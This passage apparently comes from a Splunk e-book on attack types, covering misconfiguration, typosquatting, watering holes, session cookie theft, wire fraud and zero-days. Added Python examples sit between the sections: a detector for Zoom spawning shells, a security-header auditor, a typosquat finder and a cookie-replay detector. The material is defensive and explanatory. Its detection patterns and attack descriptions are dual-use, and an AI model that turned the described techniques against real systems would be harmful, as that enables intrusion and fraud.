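# a temp directory, and one unrelated parent that must be ignored.
SAMPLE_EVENTS = [
    ProcEvent("mac01", "zoom.us", "CptHost", "/Applications/zoom.us.app/Contents/MacOS/CptHost"),
    ProcEvent("mac01", "zoom.us", "bash", "/bin/bash"),
    ProcEvent("mac02", "zoom.us", "updater", "/private/tmp/updater"),
    ProcEvent("mac02", "Terminal", "bash", "/bin/bash"),
]

if __name__ == "__main__":
    for hit in suspicious_zoom_children(SAMPLE_EVENTS):
        print(hit)
```

Unknown children are scored medium rather than dropped so that a new legitimate helper shows up once in review and can be added to the allowlist.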



System Misconfiguration
A little mistake can have drastic consequences. Nissan North America found that out after the source code of mobile
apps and internal tools was leaked online due to a system misconfiguration. The mishap was traced to a Git server
that was left exposed on the internet with a default administrator username and password combination; Nissan learned
of the leak from an anonymous source. Among other things, the leak contained source code from Nissan NA
mobile apps, client acquisition and retention tools, market research tools and data, the vehicle logistics portal and
vehicle connected services.



System Misconfiguration

What you need to know:
Security misconfiguration is a widespread problem that can put organizations at risk thanks to incorrectly configured security controls (or lack thereof). This can happen at almost any level of the IT and security stack, ranging from the company’s wireless network, to web and server applications, to custom code.

How the attack happens:
This type of attack usually happens because of missing patches, use of default accounts, unnecessary services, insecure default configuration and poor documentation. This could be attributed to everything from a failure to set a security header on a web server, to forgetting to disable administrative access for certain levels of employees. This attack can also happen when hackers take root in legacy applications with inherent misconfigurations due to a lack of updates.

Where the attack comes from:
Misconfiguration isn’t considered a malicious act in and of itself; it is mostly the result of human error. However, attackers may know where to look if they suspect a lax level of configuration across a certain organization’s IT stack.
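The "failure to set a security header" case above is the kind of thing that can be checked mechanically against every response an application returns. The following is an added example, not code from the report or from Splunk; the required-header baseline, the HSTS minimum and the sample response are assumptions a practitioner would tune to their own policy.

```python
"""Audit one HTTP response for the header and cookie misconfigurations the report lists.
Added example, not from the report or Splunk: the expectations below are assumptions
that a practitioner would tune to their own baseline."""

# Headers whose absence leaves a browser-side control switched off (assumed baseline).
REQUIRED = {
    "strict-transport-security": "no HSTS: clients may be downgraded to plain HTTP",
    "content-security-policy": "no CSP: nothing limits where scripts may load from",
    "x-content-type-options": "no X-Content-Type-Options: MIME sniffing allowed",
    "x-frame-options": "no X-Frame-Options: page can be framed for clickjacking",
}
DISCLOSING = ("server", "x-powered-by")  # version banners that ease fingerprinting
MIN_HSTS_AGE = 15552000  # 180 days, a common minimum lifetime for HSTS


def audit_response(header_pairs):
    """header_pairs: list of (name, value) as received, so repeated Set-Cookie lines survive.
    Returns a list of human-readable findings; an empty list means nothing was flagged."""
    findings = []
    present = {name.lower(): value for name, value in header_pairs}
    for name, problem in REQUIRED.items():
        if name not in present:
            findings.append(problem)
    hsts = present.get("strict-transport-security", "")
    for directive in hsts.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age" and val.isdigit() and int(val) < MIN_HSTS_AGE:
            findings.append(f"HSTS max-age {val} is below {MIN_HSTS_AGE}")
    for name in DISCLOSING:
        if name in present and any(ch.isdigit() for ch in present[name]):
            findings.append(f"{name} header discloses a version: {present[name]}")
    for name, value in header_pairs:
        if name.lower() != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        for flag in ("secure", "httponly"):
            if flag not in attrs:
                findings.append(f"cookie {cookie_name} lacks {flag}")
    return findings


# Constructed sample: missing CSP and framing protection, a short HSTS lifetime, a banner
# that reveals the server version, and a session cookie set without Secure or HttpOnly.
SAMPLE_RESPONSE = [
    ("Server", "Apache/2.4.41"),
    ("Strict-Transport-Security", "max-age=300"),
    ("X-Content-Type-Options", "nosniff"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/; Secure; HttpOnly"),
]
```

Running the audit over `SAMPLE_RESPONSE` yields six findings; the same function returns an empty list for a response that carries all four headers, a long HSTS lifetime, no version banner and flagged cookies.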




Typosquatting
Noblox.js is a wrapper for the Roblox API, a function widely used by many gamers to automate interactions with the
popular Roblox gaming platform. The software also appears to be attracting a new crowd. In 2021, hackers launched
typosquatting attacks via the noblox.js package by uploading confusingly similar packages laden with ransomware to a
registry for open source JavaScript libraries, and then distributing the infected files via a chat service. However, since
September of 2021, gamer Josh Muir along with several others have actively been cracking down on the attackers,
attempting to prevent the proliferation of ransomware through the noblox.js package and other code libraries, and
thwart further attacks on the gaming community.




Typosquatting

What you need to know:
Typosquatting is a phishing attack where attackers take advantage of commonly misspelled domain names. Oftentimes, the guilty party isn’t actually looking to carry out an attack, but instead is holding out hope that a company, brand or person will buy the domain off them. But in other cases, thieves create malicious domains that closely resemble those of legitimate brands.

How the attack happens:
This is not a sophisticated attack. It can be as simple as a 14-year-old registering a domain and then installing malicious code on said domain. The malicious form of this attack usually involves a hacker using faux domains to mislead users into interacting with malicious infrastructure.

Even for users familiar with these risks, human error is a fact of life, and most adversaries are all too aware of this reality and will take advantage of it whenever possible — like phishing with look-alike addresses, embedding fake command-and-control domains in malware, and hosting malicious content on domains that closely mimic corporate servers.

Where the attack comes from:
The origins of this attack are not as important as the target. This attack is usually aimed at unsophisticated internet users who won’t notice that the URL of their favorite domain is a letter or two off. And because this attack is so simple (it can be as easy as registering a domain name), it can originate from almost anywhere.
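Because a typosquat is by definition "a letter or two off", a registry or a mail gateway can catch most of them by measuring the edit distance between new names and the names it wants to protect, after folding look-alike characters. The following is an added example, not code from the report or from the noblox.js project; the confusable map, the protected list and the candidate names are constructed, and it generalizes from the package case in the text to domain names as well.

```python
"""Flag package or domain names that sit a typo away from names worth protecting.
Added example, not code from the report or the noblox.js project: the confusable map,
the protected list and the candidate names below are constructed for illustration."""

# Visually confusable substitutions a typosquatter might use (assumed, not exhaustive).
CONFUSABLES = {"0": "o", "1": "l", "|": "l", "rn": "m", "vv": "w", "5": "s"}


def normalize(name: str) -> str:
    """Lowercase, keep the main label ('noblox.js' -> 'noblox', 'www.example.com' ->
    'example'), then fold confusable characters. No public-suffix list is used."""
    labels = name.lower().lstrip("@").split(".")
    if labels[0] == "www" and len(labels) > 1:
        labels = labels[1:]
    base = labels[0]
    for bad, good in CONFUSABLES.items():
        base = base.replace(bad, good)
    return base


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and a swap
    of adjacent characters each cost 1, so 'nolbox' is one edit away from 'noblox'."""
    d = [[max(i, j) if min(i, j) == 0 else 0 for j in range(len(b) + 1)]
         for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalikes(candidates, protected, max_distance=2):
    """Return (candidate, protected_name, distance) for each near miss; distance 0
    means the names differ only by a confusable character or by the suffix."""
    hits = []
    for cand in candidates:
        for prot in protected:
            if cand.lower() == prot.lower():
                continue  # the genuine name itself is not a look-alike
            dist = edit_distance(normalize(cand), normalize(prot))
            if dist <= max_distance:
                hits.append((cand, prot, dist))
    return hits


# Constructed inputs: the real package name, several near misses and one unrelated name.
PROTECTED = ["noblox.js", "example.com"]
CANDIDATES = ["noblox.js", "nobIox.js", "noblx.js", "nolbox.js",
              "examp1e.com", "www.exarnple.com", "totally-different.com"]
```

A hit list like this is a review queue, not a block list: legitimate forks and brand-owned defensive registrations will also land in it.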



Watering Hole Attack
In what became a classic watering hole attack, a Florida water and wastewater treatment facility contractor inadvertently
hosted malicious code on its website, leading to the reported Oldsmar water plant hack in 2021. The cybercriminals behind
the attack seemed to have a distinct audience in mind — the malicious code found on the contractor’s site also appeared to
target other Florida water utilities, and perhaps not surprisingly, the site was visited by a browser traced to the city of Oldsmar on the
same day as the hack. While the website didn’t launch exploit code, it instead injected malware that functioned as a browser
enumeration and fingerprinting script designed to glean information from site visitors, including operating system, browser type,
time zone and presence of camera and microphone, which it then sent to a remote database hosted on a Heroku app site that
also stored the script.



Watering Hole Attack

What you need to know:
Like a literal watering hole, a watering hole attack is one in which the user’s computer is compromised by visiting an infected website with malware designed to infiltrate their network and steal data or financial assets. The specific technique is essentially a zero-day attack — the goal being to infect the computer system to gain access to a network for financial gain or proprietary information.

How the attack happens:
The attackers will first profile their target to determine the websites they frequently visit, and from there, will look for vulnerabilities. By exploiting identified flaws, the attacker compromises these websites and then waits, knowing it’s only a matter of time before the user in question visits. The compromised website will, in turn, infect their network, allowing attackers to gain entry into their entire system and then move laterally to other systems.

Where the attack comes from:
While they come from all over, many of the cybercriminals behind this attack originate where organized threat groups flourish, such as Russia, Eastern Europe and China. In 2018, a country-level watering hole attack was sourced to the Chinese threat group known as “LuckyMouse” (aka Iron Tiger, “EmissaryPanda”, “APT 27” and “Threat Group 3390”), known for targeting government, energy and manufacturing sectors with numerous types of attacks, including watering hole assaults.



Web Session Cookie Theft
Almost every web application we use, from social media and streaming platforms to cloud services and financial
applications, runs on authentication cookies. Though cookies make our experience on the web much more convenient, they
also create a vulnerability that can be abused to great effect. In late 2019, a group of loosely connected hackers made a
name for themselves by using cookie theft malware to hijack various YouTube channels, luring unsuspecting owners
with bogus offers, then broadcasting cryptocurrency scams from the accounts or selling them to the highest bidder.



Web Session Cookie Theft

What you need to know:
When an attacker successfully steals a session cookie, they can perform any actions the original user is authorized to take. A danger for organizations is that cookies can be used to identify authenticated users in single sign-on systems, potentially giving the attacker access to all of the web applications the victim can use, like financial systems, customer records or line-of-business systems potentially containing confidential intellectual property.

How the attack happens:
After a user accesses a service and validates their identity, a cookie is stored on their machine for an extended period of time so that they don’t have to log in over and over. Malicious actors can steal web session cookies through malware, then import the cookie into a browser they control, allowing them to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email or perform actions that the victim’s account has permissions to perform.

Where the attack comes from:
Cookie theft is commonly accomplished through malware that copies the victim’s cookies and sends them directly to the attacker. The malware can land on the victim’s machine in any number of ways covered in this book, like phishing, macro viruses, cross-site scripting and more. Many hackers engaging in cookie theft belong to larger networks based in Russia and China. The actors behind the YouTube attack, for example, were found to have been part of a group of hackers connected via a Russian-speaking forum.
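The "import the cookie into a browser they control" step leaves a trace on the server side: the same session identifier suddenly arrives with a different client fingerprint, or from a different network, or long after it should have expired. The following is an added example, not code from the report; the record format, the /24 heuristic, the session-age policy and the sample records are constructed, with addresses from the RFC 5737 documentation ranges.

```python
"""Spot a session cookie being replayed from a client other than the one that logged in.

Added example, not from the report: the record format, the thresholds and the sample
records are constructed; the IPs come from the RFC 5737 documentation ranges.
"""

MAX_SESSION_AGE = 12 * 3600  # seconds; an assumed policy, long-lived sessions widen the window


def net24(ip: str) -> str:
    """Collapse an IPv4 address to its /24 so a DHCP lease change inside one office
    does not raise an alert, while a jump to another network does."""
    return ".".join(ip.split(".")[:3])


def session_reuse_alerts(records):
    """records: dicts with ts (epoch seconds), session, ip and ua.
    Returns (session, reason, ts) for every record that contradicts the first
    sighting of that session cookie."""
    first_seen = {}
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        sid = rec["session"]
        base = first_seen.setdefault(sid, rec)
        if base is rec:
            continue  # first sighting, nothing to compare with yet
        if rec["ua"] != base["ua"]:
            alerts.append((sid, "user-agent changed", rec["ts"]))
        elif net24(rec["ip"]) != net24(base["ip"]):
            alerts.append((sid, "source network changed", rec["ts"]))
        elif rec["ts"] - base["ts"] > MAX_SESSION_AGE:
            alerts.append((sid, "session older than max age", rec["ts"]))
    return alerts


# Constructed access records: s1 is replayed from a new browser, s2 first moves
# within its own /24 (benign), then to another network, then outlives the policy.
SAMPLE_RECORDS = [
    {"ts": 1000, "session": "s1", "ip": "203.0.113.10", "ua": "Firefox/115"},
    {"ts": 1600, "session": "s1", "ip": "203.0.113.10", "ua": "Firefox/115"},
    {"ts": 2000, "session": "s1", "ip": "198.51.100.7", "ua": "Chrome/120"},
    {"ts": 1200, "session": "s2", "ip": "192.0.2.5", "ua": "Safari/17"},
    {"ts": 1300, "session": "s2", "ip": "192.0.2.9", "ua": "Safari/17"},
    {"ts": 1500, "session": "s2", "ip": "198.51.100.20", "ua": "Safari/17"},
    {"ts": 50000, "session": "s2", "ip": "192.0.2.5", "ua": "Safari/17"},
]

if __name__ == "__main__":
    for alert in session_reuse_alerts(SAMPLE_RECORDS):
        print(alert)
```

Detection of this kind complements, rather than replaces, shorter cookie lifetimes and the Secure and HttpOnly flags that shrink the window a stolen cookie is useful for.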



Wire Attack
While the SWIFT network has experienced fewer attacks since its infamous 2016
bank heist, cybercriminals are readily using wire transfers in new and creative ways
to launch malicious, and often lucrative, cyber assaults. In one high-profile example
in 2018, Frank Krasovec, an owner of Domino’s Pizza franchises in China, lost $450,000 when
a fraudster intercepted his email and convinced his assistant to wire money to Hong Kong on two
occasions. More recently in 2020, attackers targeted a bank manager in Hong Kong with a call that used AI voice cloning
technology to impersonate the voice of a director he knew. The cybercriminal impersonating the executive claimed his company was
making an acquisition and requested that $35 million in funds be wired electronically to another account. Usually initiated with
a phishing attack or malware, wire transfer attacks provide the vehicle for transferring copious sums of money quickly.



Wire Attack

What you need to know:
Wire attacks are sophisticated schemes that send fraudulent high-value payments through international wire transfer networks. Often going beyond ordinary wire fraud, attackers can target banks in emerging markets with limited cybersecurity infrastructure or operational controls, or lure high-profile targets with sophisticated and believable phishing scams. These cybercrime syndicates are after one thing: money. And lots of it.

How the attack happens:
In one attack scenario, cybercriminals use sophisticated malware to bypass local security systems. From there, they gain access to a messaging network and send fraudulent messages to initiate cash transfers from accounts at larger banks. In another attack scenario, the bad actors use targeted spear phishing campaigns that appear to be authentic in order to convince stakeholders to transfer large sums of money to their coffers.

Where the attack comes from:
Highly organized international and nation-state cybercrime groups, such as APT 38 and Lazarus Group, have historically been behind wire attacks. These groups have the necessary infrastructure and resources to successfully carry out complex and multi-faceted assaults. While it’s unclear who exactly is behind these groups, some reports have indicated that they might have ties to North Korea. But hacking groups from China and Nigeria have also been found to be at the source of elaborate wire transfer attacks. A note of caution: high-value wire attacks at institutions with more robust systems likely involve the use of insiders to gain access to systems.



Zero-Day Exploit
It’s hardly surprising that the number of zero-day flaws continues on an upward trajectory. But 2021 blew all other years
out of the water as malicious actors exploited a total of 58 new zero-day threats, compared to 25 flaws in 2020 and 21
vulnerabilities in 2019. And no doubt the stakes are getting higher as critical systems become more connected. In recent
years, hackers have used zero-day attacks to compromise Microsoft servers and install advanced spyware on
smartphones for espionage activities targeting journalists, politicians and human rights activists. In August 2021, for
example, a zero-day vulnerability known as “PwnedPiper” was found in the pneumatic tube systems used by hospitals to
transport bloodwork, test samples, and medications, which allowed attackers to exploit flaws in the control panel software,
while opening the door for unauthorized and unencrypted firmware updates.



Zero-Day Exploit

What you need to know:
A zero-day vulnerability, at its core, is a flaw. It is a weakness within a piece of software or a computer network that hackers take advantage of soon (or immediately) after it becomes available for general use — the term “zero” refers to the same-day window in which these vulnerabilities are abused.

How the attack happens:
A zero-day attack happens once the vulnerability is exploited. The nature of the vulnerability will affect how the attack is implemented, but zero-day attacks follow a pattern. First, the hacker (or a group of hackers working together) scans the code base for vulnerabilities. Once they find the flaw, they create code that exploits the vulnerability. They infiltrate the system (using one or more of the methods described in this book) and infect it with their malicious code, then launch the exploit.

Where the attack comes from:
The prevalence of technology has led to explosive growth in zero-day attacks. While these attacks can ostensibly be launched from anywhere, they are often proliferated via nation-states or regions with extensive cyber underworld networks and infrastructure. Recent reports have cited that the bulk of zero-day threats in 2021 were sourced to hacking groups in China.



Learn More.
Discover how your organization can thwart countless threats and
modernize your SOC using Splunk’s data-centric security operations solution.

Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk Inc. in the United States and other countries. All
other brand names, product names or trademarks belong to their respective owners. © 2022 Splunk Inc. All rights reserved.
